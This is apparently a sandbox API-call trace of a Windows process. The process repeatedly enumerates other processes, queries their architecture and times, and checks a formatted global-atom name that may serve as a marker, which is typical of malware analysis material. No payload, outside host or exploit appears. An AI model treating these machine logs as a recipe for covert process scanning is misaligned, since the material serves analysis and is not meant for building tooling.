	[0114.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.825] CloseHandle (hObject=0x698) returned 1
	[0114.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.825] CloseHandle (hObject=0x698) returned 1
	[0114.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.825] CloseHandle (hObject=0x698) returned 1
	[0114.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.825] CloseHandle (hObject=0x698) returned 1
	[0114.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.826] CloseHandle (hObject=0x698) returned 1
	[0114.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.826] CloseHandle (hObject=0x698) returned 1
	[0114.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.826] CloseHandle (hObject=0x698) returned 1
	[0114.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.826] CloseHandle (hObject=0x698) returned 1
	[0114.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.826] CloseHandle (hObject=0x698) returned 1
	[0114.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.827] CloseHandle (hObject=0x698) returned 1
	[0114.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.827] CloseHandle (hObject=0x698) returned 1
	[0114.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.828] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.828] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.828] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.829] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.829] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.829] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.829] CloseHandle (hObject=0x698) returned 1
	[0114.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.829] CloseHandle (hObject=0x698) returned 1
	[0114.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.837] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.837] CloseHandle (hObject=0x698) returned 1
	[0114.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.838] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.838] CloseHandle (hObject=0x698) returned 1
	[0114.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.903] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.903] CloseHandle (hObject=0x698) returned 1
	[0114.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.904] CloseHandle (hObject=0x698) returned 1
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.904] CloseHandle (hObject=0x698) returned 1
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.904] CloseHandle (hObject=0x698) returned 1
	[0114.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.905] CloseHandle (hObject=0x698) returned 1
	[0114.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.905] CloseHandle (hObject=0x698) returned 1
	[0114.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.905] CloseHandle (hObject=0x698) returned 1
	[0114.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.905] CloseHandle (hObject=0x698) returned 1
	[0114.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.906] CloseHandle (hObject=0x698) returned 1
	[0114.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.906] CloseHandle (hObject=0x698) returned 1
	[0114.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.906] CloseHandle (hObject=0x698) returned 1
	[0114.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.906] CloseHandle (hObject=0x698) returned 1
	[0114.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.906] CloseHandle (hObject=0x698) returned 1
	[0114.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.907] CloseHandle (hObject=0x698) returned 1
	[0114.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.907] CloseHandle (hObject=0x698) returned 1
	[0114.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.907] CloseHandle (hObject=0x698) returned 1
	[0114.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.907] CloseHandle (hObject=0x698) returned 1
	[0114.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.907] CloseHandle (hObject=0x698) returned 1
	[0114.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.908] CloseHandle (hObject=0x698) returned 1
	[0114.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.908] CloseHandle (hObject=0x698) returned 1
	[0114.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.908] CloseHandle (hObject=0x698) returned 1
	[0114.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.908] CloseHandle (hObject=0x698) returned 1
	[0114.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.909] CloseHandle (hObject=0x698) returned 1
	[0114.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.914] CloseHandle (hObject=0x698) returned 1
	[0114.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.915] CloseHandle (hObject=0x698) returned 1
	[0114.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.915] CloseHandle (hObject=0x698) returned 1
	[0114.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.915] CloseHandle (hObject=0x698) returned 1
	[0114.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.915] CloseHandle (hObject=0x698) returned 1
	[0114.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.915] CloseHandle (hObject=0x698) returned 1
	[0114.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.916] CloseHandle (hObject=0x698) returned 1
	[0114.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.916] CloseHandle (hObject=0x698) returned 1
	[0114.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.917] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.917] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.917] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.917] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.917] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.917] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.918] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.918] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.918] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.918] CloseHandle (hObject=0x698) returned 1
	[0114.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.918] CloseHandle (hObject=0x698) returned 1
	[0114.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.918] CloseHandle (hObject=0x698) returned 1
	[0114.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.918] CloseHandle (hObject=0x698) returned 1
	[0114.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.963] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.963] CloseHandle (hObject=0x698) returned 1
	[0114.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.963] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.963] CloseHandle (hObject=0x698) returned 1
	[0114.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.964] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.964] CloseHandle (hObject=0x698) returned 1
	[0114.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.964] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.964] CloseHandle (hObject=0x698) returned 1
	[0114.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.964] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.964] CloseHandle (hObject=0x698) returned 1
	[0114.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.964] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.964] CloseHandle (hObject=0x698) returned 1
	[0114.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.964] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.964] CloseHandle (hObject=0x698) returned 1
	[0114.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.965] CloseHandle (hObject=0x698) returned 1
	[0114.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.965] CloseHandle (hObject=0x698) returned 1
	[0114.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.965] CloseHandle (hObject=0x698) returned 1
	[0114.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.965] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.965] CloseHandle (hObject=0x698) returned 1
	[0114.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.966] CloseHandle (hObject=0x698) returned 1
	[0114.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.966] CloseHandle (hObject=0x698) returned 1
	[0114.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.966] CloseHandle (hObject=0x698) returned 1
	[0114.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.966] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.966] CloseHandle (hObject=0x698) returned 1
	[0114.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.967] CloseHandle (hObject=0x698) returned 1
	[0114.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.967] CloseHandle (hObject=0x698) returned 1
	[0114.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.967] CloseHandle (hObject=0x698) returned 1
	[0114.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.967] CloseHandle (hObject=0x698) returned 1
	[0114.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.967] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.967] CloseHandle (hObject=0x698) returned 1
	[0114.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.968] CloseHandle (hObject=0x698) returned 1
	[0114.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.968] CloseHandle (hObject=0x698) returned 1
	[0114.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.968] CloseHandle (hObject=0x698) returned 1
	[0114.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.968] CloseHandle (hObject=0x698) returned 1
	[0114.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.968] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.968] CloseHandle (hObject=0x698) returned 1
	[0114.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.969] CloseHandle (hObject=0x698) returned 1
	[0114.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.969] CloseHandle (hObject=0x698) returned 1
	[0114.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
